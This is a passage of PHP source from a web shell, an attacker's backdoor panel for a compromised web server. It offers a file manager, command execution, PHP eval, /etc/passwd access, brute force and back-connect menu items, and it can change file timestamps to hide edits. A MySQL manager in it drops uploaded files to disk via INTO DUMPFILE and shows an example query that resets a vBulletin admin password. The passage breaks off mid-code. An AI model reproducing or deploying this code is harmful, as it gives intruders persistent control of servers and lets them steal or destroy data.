$pg_on = @function_exists('pg_connect');
if($pg_on){echo "<font color=green>ON</font></b> - ";}else{echo "<font color=red>OFF</font></b> - ";}
echo "Oracle: <b>";
$ora_on = @function_exists('ocilogon');
if($ora_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b><BR>";}

echo "Disable functions : <b>";
if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b><BR>";}else{echo "<font color=red>$df</font></b><BR>";}

echo "<font color=white>Uname -a</font>: ".@substr(@php_uname(),0,120)."<br>";
echo "<font color=white>Server</font>: ".@substr($SERVER_SOFTWARE,0,120)." - <font color=white>id</font>: ".@getmyuid()."(".@get_current_user().") - uid=".@getmyuid()." (".@get_current_user().") gid=".@getmygid()."(".@get_current_user().")<br>";
		?>
		</td></tr></table></td>
	</tr>
	<tr class="alt1">
		<td  width=10%>
			
			<a href="javascript:goaction('file');">File Manager</a> |
			<a href="javascript:goaction('sqladmin');">MySQL Manager</a> |
			<a href="javascript:goaction('sqlfile');">MySQL Upload &amp; Download</a> |
			<a href="javascript:goaction('shell');">Execute Command</a> |
			<a href="javascript:goaction('phpenv');">PHP Variable</a> |
			<a href="javascript:goaction('eval');">Eval PHP Code</a>
			<?php if (!IS_WIN) {?> | <a href="javascript:goaction('brute');">Brute</a> <?php }?>
			<?php if (!IS_WIN) {?> | <a href="javascript:goaction('etcpwd');">/etc/passwd</a> <?php }?>
			<?php if (!IS_WIN) {?> | <a href="javascript:goaction('backconnect');">Back Connect</a><?php }?>
		</td>
	</tr>
</table>
<table width="100%" border="0" cellpadding="15" cellspacing="0"><tr><td>
<?php

formhead(array('name'=>'goaction'));
makehide('action');
formfoot();

$errmsg && m($errmsg);

// Dir function
!$dir && $dir = '.';
$nowpath = getPath(SA_ROOT, $dir);
if (substr($dir, -1) != '/') {
	$dir = $dir.'/';
}
$uedir = ue($dir);

if (!$action || $action == 'file') {

	// Non-writeable
	$dir_writeable = @is_writable($nowpath) ? 'Writable' : 'Non-writable';

	// Delete dir
	if ($doing == 'deldir' && $thefile) {
		if (!file_exists($thefile)) {
			m($thefile.' directory does not exist');
		} else {
			m('Directory delete '.(deltree($thefile) ? basename($thefile).' success' : 'failed'));
		}
	}

	// Create new dir
	elseif ($newdirname) {
		$mkdirs = $nowpath.$newdirname;
		if (file_exists($mkdirs)) {
			m('Directory has already existed');
		} else {
			m('Directory created '.(@mkdir($mkdirs,0777) ? 'success' : 'failed'));
			@chmod($mkdirs,0777);
		}
	}

	// Upload file
	elseif ($doupfile) {
		m('File upload '.(@copy($_FILES['uploadfile']['tmp_name'],$uploaddir.'/'.$_FILES['uploadfile']['name']) ? 'success' : 'failed'));
	}

	// Edit file
	elseif ($editfilename && $filecontent) {
		$fp = @fopen($editfilename,'w');
		m('Save file '.(@fwrite($fp,$filecontent) ? 'success' : 'failed'));
		@fclose($fp);
	}

	// Modify
	elseif ($pfile && $newperm) {
		if (!file_exists($pfile)) {
			m('The original file does not exist');
		} else {
			$newperm = base_convert($newperm,8,10);
			m('Modify file attributes '.(@chmod($pfile,$newperm) ? 'success' : 'failed'));
		}
	}

	// Rename
	elseif ($oldname && $newfilename) {
		$nname = $nowpath.$newfilename;
		if (file_exists($nname) || !file_exists($oldname)) {
			m($nname.' has already existed or original file does not exist');
		} else {
			m(basename($oldname).' renamed '.basename($nname).(@rename($oldname,$nname) ? ' success' : 'failed'));
		}
	}

	// Copu
	elseif ($sname && $tofile) {
		if (file_exists($tofile) || !file_exists($sname)) {
			m('The goal file has already existed or original file does not exist');
		} else {
			m(basename($tofile).' copied '.(@copy($sname,$tofile) ? basename($tofile).' success' : 'failed'));
		}
	}

	// File exit
	elseif ($curfile && $tarfile) {
		if (!@file_exists($curfile) || !@file_exists($tarfile)) {
			m('The goal file has already existed or original file does not exist');
		} else {
			$time = @filemtime($tarfile);
			m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
		}
	}

	// Date
	elseif ($curfile && $year && $month && $day && $hour && $minute && $second) {
		if (!@file_exists($curfile)) {
			m(basename($curfile).' does not exist');
		} else {
			$time = strtotime("$year-$month-$day $hour:$minute:$second");
			m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
		}
	}

	// Download
	elseif($doing == 'downrar') {
		if ($dl) {
			$dfiles='';
			foreach ($dl as $filepath => $value) {
				$dfiles.=$filepath.',';
			}
			$dfiles=substr($dfiles,0,strlen($dfiles)-1);
			$dl=explode(',',$dfiles);
			$zip=new PHPZip($dl);
			$code=$zip->out;
			header('Content-type: application/octet-stream');
			header('Accept-Ranges: bytes');
			header('Accept-Length: '.strlen($code));
			header('Content-Disposition: attachment;filename='.$_SERVER['HTTP_HOST'].'_Files.tar.gz');
			echo $code;
			exit;
		} else {
			m('Please select file(s)');
		}
	}

	// Delete file
	elseif($doing == 'delfiles') {
		if ($dl) {
			$dfiles='';
			$succ = $fail = 0;
			foreach ($dl as $filepath => $value) {
				if (@unlink($filepath)) {
					$succ++;
				} else {
					$fail++;
				}
			}
			m('Deleted file have finished??choose '.count($dl).' success '.$succ.' fail '.$fail);
		} else {
			m('Please select file(s)');
		}
	}

	// Function Newdir
	formhead(array('name'=>'createdir'));
	makehide('newdirname');
	makehide('dir',$nowpath);
	formfoot();
	formhead(array('name'=>'fileperm'));
	makehide('newperm');
	makehide('pfile');
	makehide('dir',$nowpath);
	formfoot();
	formhead(array('name'=>'copyfile'));
	makehide('sname');
	makehide('tofile');
	makehide('dir',$nowpath);
	formfoot();
	formhead(array('name'=>'rename'));
	makehide('oldname');
	makehide('newfilename');
	makehide('dir',$nowpath);
	formfoot();
	formhead(array('name'=>'fileopform'));
	makehide('action');
	makehide('opfile');
	makehide('dir');
	formfoot();

	$free = @disk_free_space($nowpath);
	!$free && $free = 0;
	$all = @disk_total_space($nowpath);
	!$all && $all = 0;
	$used = $all-$free;
	$used_percent = @round(100/($all/$free),2);
	p('<font color=yellow face=tahoma size=2><B>File Manager</b> </font> Current disk free <font color=red>'.sizecount($free).'</font> of <font color=red>'.sizecount($all).'</font> (<font color=red>'.$used_percent.'</font>%)</font>');

?>
<table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">
  <form action="" method="post" id="godir" name="godir">
  <tr>
    <td nowrap>Current Directory (<?php echo $dir_writeable;?>, <?php echo getChmod($nowpath);?>)</td>
	<td width="100%"><input name="view_writable" value="0" type="hidden" /><input class="input" name="dir" value="<?php echo $nowpath;?>" type="text" style="width:100%;margin:0 8px;"></td>
    <td nowrap><input class="bt" value="GO" type="submit"></td>
  </tr>
  </form>
</table>
<script type="text/javascript">
function createdir(){
	var newdirname;
	newdirname = prompt('Please input the directory name:', '');
	if (!newdirname) return;
	$('createdir').newdirname.value=newdirname;
	$('createdir').submit();
}
function fileperm(pfile){
	var newperm;
	newperm = prompt('Current file:'+pfile+'\nPlease input new attribute:', '');
	if (!newperm) return;
	$('fileperm').newperm.value=newperm;
	$('fileperm').pfile.value=pfile;
	$('fileperm').submit();
}
function copyfile(sname){
	var tofile;
	tofile = prompt('Original file:'+sname+'\nPlease input object file (fullpath):', '');
	if (!tofile) return;
	$('copyfile').tofile.value=tofile;
	$('copyfile').sname.value=sname;
	$('copyfile').submit();
}
function rename(oldname){
	var newfilename;
	newfilename = prompt('Former file name:'+oldname+'\nPlease input new filename:', '');
	if (!newfilename) return;
	$('rename').newfilename.value=newfilename;
	$('rename').oldname.value=oldname;
	$('rename').submit();
}
function dofile(doing,thefile,m){
	if (m && !confirm(m)) {
		return;
	}
	$('filelist').doing.value=doing;
	if (thefile){
		$('filelist').thefile.value=thefile;
	}
	$('filelist').submit();
}
function createfile(nowpath){
	var filename;
	filename = prompt('Please input the file name:', '');
	if (!filename) return;
	opfile('editfile',nowpath + filename,nowpath);
}
function opfile(action,opfile,dir){
	$('fileopform').action.value=action;
	$('fileopform').opfile.value=opfile;
	$('fileopform').dir.value=dir;
	$('fileopform').submit();
}
function godir(dir,view_writable){
	if (view_writable) {
		$('godir').view_writable.value=1;
	}
	$('godir').dir.value=dir;
	$('godir').submit();
}
</script>
  <?php
	tbhead();
	p('<form action="'.$self.'" method="POST" enctype="multipart/form-data"><tr class="alt1"><td colspan="7" style="padding:5px;">');
	p('<div style="float:right;"><input class="input" name="uploadfile" value="" type="file" /> <input class="" name="doupfile" value="Upload" type="submit" /><input name="uploaddir" value="'.$dir.'" type="hidden" /><input name="dir" value="'.$dir.'" type="hidden" /></div>');
	p('<a href="javascript:godir(\''.$_SERVER["DOCUMENT_ROOT"].'\');">WebRoot</a>');
	if ($view_writable) {
		p(' | <a href="javascript:godir(\''.$nowpath.'\');">View All</a>');
	} else {
		p(' | <a href="javascript:godir(\''.$nowpath.'\',\'1\');">View Writable</a>');
	}
	p(' | <a href="javascript:createdir();">Create Directory</a> | <a href="javascript:createfile(\''.$nowpath.'\');">Create File</a>');
	if (IS_WIN && IS_COM) {
		$obj = new COM('scripting.filesystemobject');
		if ($obj && is_object($obj)) {
			$DriveTypeDB = array(0 => 'Unknow',1 => 'Removable',2 => 'Fixed',3 => 'Network',4 => 'CDRom',5 => 'RAM Disk');
			foreach($obj->Drives as $drive) {
				if ($drive->DriveType == 2) {
					p(' | <a href="javascript:godir(\''.$drive->Path.'/\');" title="Size:'.sizecount($drive->TotalSize).'&#13;Free:'.sizecount($drive->FreeSpace).'&#13;Type:'.$DriveTypeDB[$drive->DriveType].'">'.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')</a>');
				} else {
					p(' | <a href="javascript:godir(\''.$drive->Path.'/\');" title="Type:'.$DriveTypeDB[$drive->DriveType].'">'.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')</a>');
				}
			}
		}
	}

	p('</td></tr></form>');

	p('<tr class="head"><td>&nbsp;</td><td>Filename</td><td width="16%">Last modified</td><td width="10%">Size</td><td width="20%">Chmod / Perms</td><td width="22%">Action</td></tr>');

	// Get path
	$dirdata=array();
	$filedata=array();

	if ($view_writable) {
		$dirdata = GetList($nowpath);
	} else {
		// Open dir
		$dirs=@opendir($dir);
		while ($file=@readdir($dirs)) {
			$filepath=$nowpath.$file;
			if(@is_dir($filepath)){
				$dirdb['filename']=$file;
				$dirdb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
				$dirdb['dirchmod']=getChmod($filepath);
				$dirdb['dirperm']=getPerms($filepath);
				$dirdb['fileowner']=getUser($filepath);
				$dirdb['dirlink']=$nowpath;
				$dirdb['server_link']=$filepath;
				$dirdb['client_link']=ue($filepath);
				$dirdata[]=$dirdb;
			} else {
				$filedb['filename']=$file;
				$filedb['size']=sizecount(@filesize($filepath));
				$filedb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
				$filedb['filechmod']=getChmod($filepath);
				$filedb['fileperm']=getPerms($filepath);
				$filedb['fileowner']=getUser($filepath);
				$filedb['dirlink']=$nowpath;
				$filedb['server_link']=$filepath;
				$filedb['client_link']=ue($filepath);
				$filedata[]=$filedb;
			}
		}// while
		unset($dirdb);
		unset($filedb);
		@closedir($dirs);
	}
	@sort($dirdata);
	@sort($filedata);
	$dir_i = '0';
	foreach($dirdata as $key => $dirdb){
		if($dirdb['filename']!='..' && $dirdb['filename']!='.') {
			$thisbg = bg();
			p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
			p('<td width="2%" nowrap><font face="wingdings" size="3">0</font></td>');
			p('<td><a href="javascript:godir(\''.$dirdb['server_link'].'\');">'.$dirdb['filename'].'</a></td>');
			p('<td nowrap>'.$dirdb['mtime'].'</td>');
			p('<td nowrap>--</td>');
			p('<td nowrap>');
			p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirchmod'].'</a> / ');
			p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirperm'].'</a>'.$dirdb['fileowner'].'</td>');
			p('<td nowrap><a href="javascript:dofile(\'deldir\',\''.$dirdb['server_link'].'\',\'Are you sure will delete '.$dirdb['filename'].'? \\n\\nIf non-empty directory, will be delete all the files.\')">Del</a> | <a href="javascript:rename(\''.$dirdb['server_link'].'\');">Rename</a></td>');
			p('</tr>');
			$dir_i++;
		} else {
			if($dirdb['filename']=='..') {
				p('<tr class=fout>');
				p('<td align="center"><font face="Wingdings 3" size=4>=</font></td><td nowrap colspan="5"><a href="javascript:godir(\''.getUpPath($nowpath).'\');">Parent Directory</a></td>');
				p('</tr>');
			}
		}
	}

	p('<tr bgcolor="green" stlye="border-top:1px solid gray;border-bottom:1px solid gray;"><td colspan="6" height="5"></td></tr>');
	p('<form id="filelist" name="filelist" action="'.$self.'" method="post">');
	makehide('action','file');
	makehide('thefile');
	makehide('doing');
	makehide('dir',$nowpath);
	$file_i = '0';
	foreach($filedata as $key => $filedb){
		if($filedb['filename']!='..' && $filedb['filename']!='.') {
			$fileurl = str_replace(SA_ROOT,'',$filedb['server_link']);
			$thisbg = bg();
			p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
			p('<td width="2%" nowrap><input type="checkbox" value="1" name="dl['.$filedb['server_link'].']"></td>');
			p('<td><a href="'.$fileurl.'" target="_blank">'.$filedb['filename'].'</a></td>');
			p('<td nowrap>'.$filedb['mtime'].'</td>');
			p('<td nowrap>'.$filedb['size'].'</td>');
			p('<td nowrap>');
			p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['filechmod'].'</a> / ');
			p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['fileperm'].'</a>'.$filedb['fileowner'].'</td>');
			p('<td nowrap>');
			p('<a href="javascript:dofile(\'downfile\',\''.$filedb['server_link'].'\');">Down</a> | ');
			p('<a href="javascript:copyfile(\''.$filedb['server_link'].'\');">Copy</a> | ');
			p('<a href="javascript:opfile(\'editfile\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">Edit</a> | ');
			p('<a href="javascript:rename(\''.$filedb['server_link'].'\');">Rename</a> | ');
			p('<a href="javascript:opfile(\'newtime\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">Time</a>');
			p('</td></tr>');
			$file_i++;
		}
	}
	p('<tr class="fout1"><td align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td><td><a href="javascript:dofile(\'downrar\');">Packing download selected</a> - <a href="javascript:dofile(\'delfiles\');">Delete selected</a></td><td colspan="4" align="right">'.$dir_i.' directories / '.$file_i.' files</td></tr>');
	p('</form></table>');
}// end dir

elseif ($action == 'sqlfile') {
	if($doing=="mysqlupload"){
		$file = $_FILES['uploadfile'];
		$filename = $file['tmp_name'];
		if (file_exists($savepath)) {
			m('The goal file has already existed');
		} else {
			if(!$filename) {
				m('Please choose a file');
			} else {
				$fp=@fopen($filename,'r');
				$contents=@fread($fp, filesize($filename));
				@fclose($fp);
				$contents = bin2hex($contents);
				if(!$upname) $upname = $file['name'];
				dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
				$result = q("SELECT 0x{$contents} FROM mysql.user INTO DUMPFILE '$savepath';");
				m($result ? 'Upload success' : 'Upload has failed: '.mysql_error());
			}
		}
	}
?>
<script type="text/javascript">
function mysqlfile(doing){
	if(!doing) return;
	$('doing').value=doing;
	$('mysqlfile').dbhost.value=$('dbinfo').dbhost.value;
	$('mysqlfile').dbport.value=$('dbinfo').dbport.value;
	$('mysqlfile').dbuser.value=$('dbinfo').dbuser.value;
	$('mysqlfile').dbpass.value=$('dbinfo').dbpass.value;
	$('mysqlfile').dbname.value=$('dbinfo').dbname.value;
	$('mysqlfile').charset.value=$('dbinfo').charset.value;
	$('mysqlfile').submit();
}
</script>
<?php
	!$dbhost && $dbhost = 'localhost';
	!$dbuser && $dbuser = 'root';
	!$dbport && $dbport = '3306';
	$charsets = array(''=>'Default','gbk'=>'GBK', 'big5'=>'Big5', 'utf8'=>'UTF-8', 'latin1'=>'Latin1');
	formhead(array('title'=>'MYSQL Information','name'=>'dbinfo'));
	makehide('action','sqlfile');
	p('<p>');
	p('DBHost:');
	makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
	p(':');
	makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));
	p('DBUser:');
	makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
	p('DBPass:');
	makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
	p('DBName:');
	makeinput(array('name'=>'dbname','size'=>15,'value'=>$dbname));
	p('DBCharset:');
	makeselect(array('name'=>'charset','option'=>$charsets,'selected'=>$charset));
	p('</p>');
	formfoot();
	p('<form action="'.$self.'" method="POST" enctype="multipart/form-data" name="mysqlfile" id="mysqlfile">');
	p('<h2>Upload file</h2>');
	p('<p><b>This operation the DB user must has FILE privilege</b></p>');
	p('<p>Save path(fullpath): <input class="input" name="savepath" size="45" type="text" /> Choose a file: <input class="input" name="uploadfile" type="file" /> <a href="javascript:mysqlfile(\'mysqlupload\');">Upload</a></p>');
	p('<h2>Download file</h2>');
	p('<p>File: <input class="input" name="mysqldlfile" size="115" type="text" /> <a href="javascript:mysqlfile(\'mysqldown\');">Download</a></p>');
	makehide('dbhost');
	makehide('dbport');
	makehide('dbuser');
	makehide('dbpass');
	makehide('dbname');
	makehide('charset');
	makehide('doing');
	makehide('action','sqlfile');
	p('</form>');
}

elseif ($action == 'sqladmin') {
	!$dbhost && $dbhost = 'localhost';
	!$dbuser && $dbuser = 'root';
	!$dbport && $dbport = '3306';
	$dbform = '<input type="hidden" id="connect" name="connect" value="1" />';
	if(isset($dbhost)){
		$dbform .= "<input type=\"hidden\" id=\"dbhost\" name=\"dbhost\" value=\"$dbhost\" />\n";
	}
	if(isset($dbuser)) {
		$dbform .= "<input type=\"hidden\" id=\"dbuser\" name=\"dbuser\" value=\"$dbuser\" />\n";
	}
	if(isset($dbpass)) {
		$dbform .= "<input type=\"hidden\" id=\"dbpass\" name=\"dbpass\" value=\"$dbpass\" />\n";
	}
	if(isset($dbport)) {
		$dbform .= "<input type=\"hidden\" id=\"dbport\" name=\"dbport\" value=\"$dbport\" />\n";
	}
	if(isset($dbname)) {
		$dbform .= "<input type=\"hidden\" id=\"dbname\" name=\"dbname\" value=\"$dbname\" />\n";
	}
	if(isset($charset)) {
		$dbform .= "<input type=\"hidden\" id=\"charset\" name=\"charset\" value=\"$charset\" />\n";
	}

	if ($doing == 'backupmysql' && $saveasfile) {
		if (!$table) {
			m('Please choose the table');
		} else {
			dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
			$table = array_flip($table);
			$fp = @fopen($path,'w');
			if ($fp) {
				$result = q('SHOW tables');
				if (!$result) p('<h2>'.mysql_error().'</h2>');
				$mysqldata = '';
				while ($currow = mysql_fetch_array($result)) {
					if (isset($table[$currow[0]])) {
						sqldumptable($currow[0], $fp);
					}
				}
				fclose($fp);
				$fileurl = str_replace(SA_ROOT,'',$path);
				m('Database has success backup to <a href="'.$fileurl.'" target="_blank">'.$path.'</a>');
				mysql_close();
			} else {
				m('Backup failed');
			}
		}
	}
	if ($insert && $insertsql) {
		$keystr = $valstr = $tmp = '';
		foreach($insertsql as $key => $val) {
			if ($val) {
				$keystr .= $tmp.$key;
				$valstr .= $tmp."'".addslashes($val)."'";
				$tmp = ',';
			}
		}
		if ($keystr && $valstr) {
			dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
			m(q("INSERT INTO $tablename ($keystr) VALUES ($valstr)") ? 'Insert new record of success' : mysql_error());
		}
	}
	if ($update && $insertsql && $base64) {
		$valstr = $tmp = '';
		foreach($insertsql as $key => $val) {
			$valstr .= $tmp.$key."='".addslashes($val)."'";
			$tmp = ',';
		}
		if ($valstr) {
			$where = base64_decode($base64);
			dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
			m(q("UPDATE $tablename SET $valstr WHERE $where LIMIT 1") ? 'Record updating' : mysql_error());
		}
	}
	if ($doing == 'del' && $base64) {
		$where = base64_decode($base64);
		$delete_sql = "DELETE FROM $tablename WHERE $where";
		dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
		m(q("DELETE FROM $tablename WHERE $where") ? 'Deletion record of success' : mysql_error());
	}

	if ($tablename && $doing == 'drop') {
		dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
		if (q("DROP TABLE $tablename")) {
			m('Drop table of success');
			$tablename = '';
		} else {
			m(mysql_error());
		}
	}

	$charsets = array(''=>'Default','gbk'=>'GBK', 'big5'=>'Big5', 'utf8'=>'UTF-8', 'latin1'=>'Latin1');

	formhead(array('title'=>'MYSQL Manager'));
	makehide('action','sqladmin');
	p('<p>');
	p('DBHost:');
	makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
	p(':');
	makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));
	p('DBUser:');
	makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
	p('DBPass:');
	makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
	p('DBCharset:');
	makeselect(array('name'=>'charset','option'=>$charsets,'selected'=>$charset));
	makeinput(array('name'=>'connect','value'=>'Connect','type'=>'submit','class'=>'bt'));
	p('</p>');
	formfoot();
?>
<script type="text/javascript">
function editrecord(action, base64, tablename){
	if (action == 'del') {
		if (!confirm('Is or isn\'t deletion record?')) return;
	}
	$('recordlist').doing.value=action;
	$('recordlist').base64.value=base64;
	$('recordlist').tablename.value=tablename;
	$('recordlist').submit();
}
function moddbname(dbname) {
	if(!dbname) return;
	$('setdbname').dbname.value=dbname;
	$('setdbname').submit();
}
function settable(tablename,doing,page) {
	if(!tablename) return;
	if (doing) {
		$('settable').doing.value=doing;
	}
	if (page) {
		$('settable').page.value=page;
	}
	$('settable').tablename.value=tablename;
	$('settable').submit();
}
</script>
<?php
	// SQL
	formhead(array('name'=>'recordlist'));
	makehide('doing');
	makehide('action','sqladmin');
	makehide('base64');
	makehide('tablename');
	p($dbform);
	formfoot();

	// Data
	formhead(array('name'=>'setdbname'));
	makehide('action','sqladmin');
	p($dbform);
	if (!$dbname) {
		makehide('dbname');
	}
	formfoot();


	formhead(array('name'=>'settable'));
	makehide('action','sqladmin');
	p($dbform);
	makehide('tablename');
	makehide('page',$page);
	makehide('doing');
	formfoot();

	$cachetables = array();
	$pagenum = 30;
	$page = intval($page);
	if($page) {
		$start_limit = ($page - 1) * $pagenum;
	} else {
		$start_limit = 0;
		$page = 1;
	}
	if (isset($dbhost) && isset($dbuser) && isset($dbpass) && isset($connect)) {
		dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
		// get mysql server
		$mysqlver = mysql_get_server_info();
		p('<p>MySQL '.$mysqlver.' running in '.$dbhost.' as '.$dbuser.'@'.$dbhost.'</p>');
		$highver = $mysqlver > '4.1' ? 1 : 0;

		// Show database
		$query = q("SHOW DATABASES");
		$dbs = array();
		$dbs[] = '-- Select a database --';
		while($db = mysql_fetch_array($query)) {
			$dbs[$db['Database']] = $db['Database'];
		}
		makeselect(array('title'=>'Please select a database:','name'=>'db[]','option'=>$dbs,'selected'=>$dbname,'onchange'=>'moddbname(this.options[this.selectedIndex].value)','newline'=>1));
		$tabledb = array();
		if ($dbname) {
			p('<p>');
			p('Current dababase: <a href="javascript:moddbname(\''.$dbname.'\');">'.$dbname.'</a>');
			if ($tablename) {
				p(' | Current Table: <a href="javascript:settable(\''.$tablename.'\');">'.$tablename.'</a> [ <a href="javascript:settable(\''.$tablename.'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$tablename.'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$tablename.'\', \'drop\');">Drop</a> ]');
			}
			p('</p>');
			mysql_select_db($dbname);

			$getnumsql = '';
			$runquery = 0;
			if ($sql_query) {
				$runquery = 1;
			}
			$allowedit = 0;
			if ($tablename && !$sql_query) {
				$sql_query = "SELECT * FROM $tablename";
				$getnumsql = $sql_query;
				$sql_query = $sql_query." LIMIT $start_limit, $pagenum";
				$allowedit = 1;
			}
			p('<form action="'.$self.'" method="POST">');
			p('<p><table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td colspan="2">Run SQL query/queries on database <font color=red><b>'.$dbname.'</font></b>:<BR>Example VBB Password: <font color=red>vbateam</font><BR><font color=yellow>UPDATE `user` SET `password` = \'69e53e5ab9536e55d31ff533aefc4fbe\', salt = \'p5T\' WHERE `userid` = \'1\' </font>
			</td></tr><tr><td><textarea name="sql_query" class="area" style="width:600px;height:50px;overflow:auto;">'.htmlspecialchars($sql_query,ENT_QUOTES).'</textarea></td><td style="padding:0 5px;"><input class="bt" style="height:50px;" name="submit" type="submit" value="Query" /></td></tr></table></p>');
			makehide('tablename', $tablename);
			makehide('action','sqladmin');
			p($dbform);
			p('</form>');
			if ($tablename || ($runquery && $sql_query)) {
				if ($doing == 'structure') {
					$result = q("SHOW COLUMNS FROM $tablename");
					$rowdb = array();
					while($row = mysql_fetch_array($result)) {
						$rowdb[] = $row;
					}
					p('<table border="0" cellpadding="3" cellspacing="0">');
					p('<tr class="head">');
					p('<td>Field</td>');
					p('<td>Type</td>');
					p('<td>Null</td>');
					p('<td>Key</td>');
					p('<td>Default</td>');
					p('<td>Extra</td>');
					p('</tr>');
					foreach ($rowdb as $row) {
						$thisbg = bg();
						p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
						p('<td>'.$row['Field'].'</td>');
						p('<td>'.$row['Type'].'</td>');
						p('<td>'.$row['Null'].'&nbsp;</td>');
						p('<td>'.$row['Key'].'&nbsp;</td>');
						p('<td>'.$row['Default'].'&nbsp;</td>');
						p('<td>'.$row['Extra'].'&nbsp;</td>');
						p('</tr>');
					}
					tbfoot();
				} elseif ($doing == 'insert' || $doing == 'edit') {
					$result = q('SHOW COLUMNS FROM '.$tablename);
					while ($row = mysql_fetch_array($result)) {
						$rowdb[] = $row;
					}
					$rs = array();
					if ($doing == 'insert') {
						p('<h2>Insert new line in '.$tablename.' table &raquo;</h2>');
					} else {
						p('<h2>Update record in '.$tablename.' table &raquo;</h2>');
						$where = base64_decode($base64);
						$result = q("SELECT * FROM $tablename WHERE $where LIMIT 1");
						$rs = mysql_fetch_array($result);
					}
					p('<form method="post" action="'.$self.'">');
					p($dbform);
					makehide('action','sqladmin');
					makehide('tablename',$tablename);
					p('<table border="0" cellpadding="3" cellspacing="0">');
					foreach ($rowdb as $row) {
						if ($rs[$row['Field']]) {
							$value = htmlspecialchars($rs[$row['Field']]);
						} else {
							$value = '';
						}
						$thisbg = bg();
						p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
						p('<td><b>'.$row['Field'].'</b><br />'.$row['Type'].'</td><td><textarea class="area" name="insertsql['.$row['Field'].']" style="width:500px;height:60px;overflow:auto;">'.$value.'</textarea></td></tr>');
					}
					if ($doing == 'insert') {
						p('<tr class="fout"><td colspan="2"><input class="bt" type="submit" name="insert" value="Insert" /></td></tr>');
					} else {
						p('<tr class="fout"><td colspan="2"><input class="bt" type="submit" name="update" value="Update" /></td></tr>');
						makehide('base64', $base64);
					}
					p('</table></form>');
				} else {
					$querys = @explode(';',$sql_query);
					foreach($querys as $num=>$query) {
						if ($query) {
							p("<p><b>Query#{$num} : ".htmlspecialchars($query,ENT_QUOTES)."</b></p>");
							switch(qy($query))
							{
								case 0:
									p('<h2>Error : '.mysql_error().'</h2>');
									break;
								case 1:
									if (strtolower(substr($query,0,13)) == 'select * from') {
										$allowedit = 1;
									}
									if ($getnumsql) {
										$tatol = mysql_num_rows(q($getnumsql));
										$multipage = multi($tatol, $pagenum, $page, $tablename);
									}
									if (!$tablename) {
										$sql_line = str_replace(array("\r", "\n", "\t"), array(' ', ' ', ' '), trim(htmlspecialchars($query)));
										$sql_line = preg_replace("/\/\*[^(\*\/)]*\*\//i", " ", $sql_line);
										preg_match_all("/from\s+`{0,1}([\w]+)`{0,1}\s+/i",$sql_line,$matches);
										$tablename = $matches[1][0];
									}
									$result = q($query);
									p($multipage);
									p('<table border="0" cellpadding="3" cellspacing="0">');
									p('<tr class="head">');
									if ($allowedit) p('<td>Action</td>');
									$fieldnum = @mysql_num_fields($result);
									for($i=0;$i<$fieldnum;$i++){
										$name = @mysql_field_name($result, $i);
										$type = @mysql_field_type($result, $i);
										$len = @mysql_field_len($result, $i);
										p("<td nowrap>$name<br><span>$type($len)</span></td>");
									}
									p('</tr>');
									while($mn = @mysql_fetch_assoc($result)){
										$thisbg = bg();
										p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
										$where = $tmp = $b1 = '';
										foreach($mn as $key=>$inside){
											if ($inside) {
												$where .= $tmp.$key."='".addslashes($inside)."'";
												$tmp = ' AND ';
											}
											$b1 .= '<td nowrap>'.html_clean($inside).'&nbsp;</td>';
										}
										$where = base64_encode($where);
										if ($allowedit) p('<td nowrap><a href="javascript:editrecord(\'edit\', \''.$where.'\', \''.$tablename.'\');">Edit</a> | <a href="javascript:editrecord(\'del\', \''.$where.'\', \''.$tablename.'\');">Del</a></td>');
										p($b1);
										p('</tr>');
										unset($b1);
									}
									tbfoot();
									p($multipage);
									break;
								case 2:
									$ar = mysql_affected_rows();
									p('<h2>affected rows : <b>'.$ar.'</b></h2>');
									break;
							}
						}
					}
				}
			} else {
				$query = q("SHOW TABLE STATUS");
				$table_num = $table_rows = $data_size = 0;
				$tabledb = array();
				while($table = mysql_fetch_array($query)) {
					$data_size = $data_size + $table['Data_length'];
					$table_rows = $table_rows + $table['Rows'];
					$table['Data_length'] = sizecount($table['Data_length']);
					$table_num++;
					$tabledb[] = $table;
